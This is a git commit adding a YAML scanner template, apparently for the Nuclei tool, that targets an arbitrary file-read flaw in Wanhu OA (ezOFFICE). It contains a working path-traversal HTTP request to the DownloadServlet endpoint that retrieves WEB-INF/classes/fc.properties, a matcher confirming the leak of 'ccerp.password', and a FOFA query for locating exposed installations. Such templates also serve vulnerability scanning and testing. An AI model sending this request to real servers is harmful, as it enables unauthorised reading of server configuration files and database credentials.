Added wanhuoa-DownloadServlet-LFI Template

patch-1
5Yir5oqT5oiR 2024-01-12 11:46:07 +08:00
parent e69c9d4e2d
commit aa4c02b0eb
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: wanhuoa-DownloadServlet-LFI
info:
name: wanhuoa DownloadServlet LFI
author: wp
severity: high
description: |
万户OA DownloadServlet接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器中的敏感文件获取敏感信息 | The DownloadServlet interface has any file read vulnerability. Attackers can read sensitive files on the server and obtain sensitive information through this vulnerability
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="万户网络-ezOFFICE"
tags: oa,wanhu,LFI,high
http:
- raw:
- |+
GET /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'ccerp.password')"
condition: and